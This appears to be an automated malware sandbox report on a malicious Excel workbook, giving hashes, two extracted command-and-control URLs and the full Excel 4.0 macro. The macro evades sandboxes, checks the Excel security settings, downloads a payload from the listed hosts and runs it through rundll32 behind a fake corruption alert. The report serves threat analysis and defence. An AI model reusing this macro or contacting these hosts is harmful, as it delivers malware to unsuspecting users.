Static task
static1
Behavioral task
behavioral1
Sample
5af3bdbe31bf60ddc4bd101f4bee6e843a58450b4d39c8a12ce58135ec4b1b19.xls
Resource
win7v200410
Behavioral task
behavioral2
Sample
5af3bdbe31bf60ddc4bd101f4bee6e843a58450b4d39c8a12ce58135ec4b1b19.xls
Resource
win10v200410
General
-
Target
-
Size
192KB
-
MD5
bf1efbdca05fab7682b9da5b800c2d4c
-
SHA1
e57949811523eed8ab9321394a537bb909eaa7e7
-
SHA256
5af3bdbe31bf60ddc4bd101f4bee6e843a58450b4d39c8a12ce58135ec4b1b19
-
SHA512
4ba1b206c2085926972d87d044b770394443b129e707c8f396725597b36a9cb4f7be5de7a9026d579331d6af5a3365d74e3cfe1148420010a2625c7681ed8b07
Score
10/10
Malware Config
Extracted
Rule | Excel 4.0 XLM Macro |
C2 |
https://gameaze.com/wp-content/themes/wp_data.php https://friendoffishing.com/wp-content/themes/calliope/template-parts/wp_data.php |
Attributes |
formulas =IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)
=IF(GET.WORKSPACE(14)<390,CLOSE(FALSE),)
=IF(GET.WORKSPACE(19),,CLOSE(TRUE))
=IF(GET.WORKSPACE(42),,CLOSE(TRUE))
=IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,CLOSE(TRUE))
="C:\Users\"&GET.WORKSPACE(26)&"\AppData\Local\Temp\"&RANDBETWEEN(1,9999)&".reg"
="EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security "&R[-1]C&" /y"
=CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe",R[-1]C,0,5)
=WAIT(NOW()+"00:00:03")
=FOPEN(R[-4]C)
=FPOS(R[-1]C,215)
=FREAD(R[-2]C,255)
=FCLOSE(R[-3]C)
=FILE.DELETE(R[-8]C)
=IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
="C:\Users\"&GET.WORKSPACE(26)&"\AppData\Local\Temp\CVR"&RANDBETWEEN(1000,9999)&".tmp.cvr"
="https://gameaze.com/wp-content/themes/wp_data.php"
="https://friendoffishing.com/wp-content/themes/calliope/template-parts/wp_data.php"
=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,R[-2]C,R[-3]C,0,0)
=IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,R[-2]C,R[-4]C,0,0),)
=ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
=CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe",R[-6]C&",DllRegisterServer",0,5)
=CLOSE(FALSE)
=GOTO(Y1) |
Signatures
Files
-
5af3bdbe31bf60ddc4bd101f4bee6e843a58450b4d39c8a12ce58135ec4b1b19.xls windows office2003